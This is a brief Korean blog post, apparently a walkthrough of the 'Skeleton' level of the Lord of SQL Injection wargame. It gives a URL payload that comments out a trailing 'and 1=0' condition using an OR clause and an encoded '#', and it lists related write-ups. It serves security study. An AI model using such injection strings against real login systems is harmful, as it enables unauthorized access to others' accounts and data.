보안 공부/Load of SQL injection

[Load of SQL Injection] Skeleton

sh1256 2022. 1. 28. 02:03
728x90

뒤에있는 and 1=0을 참으로 만들긴 어렵다. 

때문에 주석처리를 해주면 된다. 

 

URL 뒤에

?pw=1'or id='adimin'%23

(%23은 '#'을 URL 인코딩한 것)

을 입력하면 정답

 

 

++ 왜 '--'는 안되는가 ;;;ㅠㅜㅠ

++ #뒤에 공백을 붙여도 안되는가 ㅠㅜㅠ

'보안 공부 > Load of SQL injection' 카테고리의 다른 글

[Load of SQL Injection] dark knight  (0) 2022.01.28
[Load of SQL Injection] Golem  (0) 2022.01.28
[Load of SQL Injection] vampire  (0) 2022.01.28
[Load of SQL Injection] troll  (0) 2022.01.28
[Load of SQL injection] orge  (0) 2022.01.28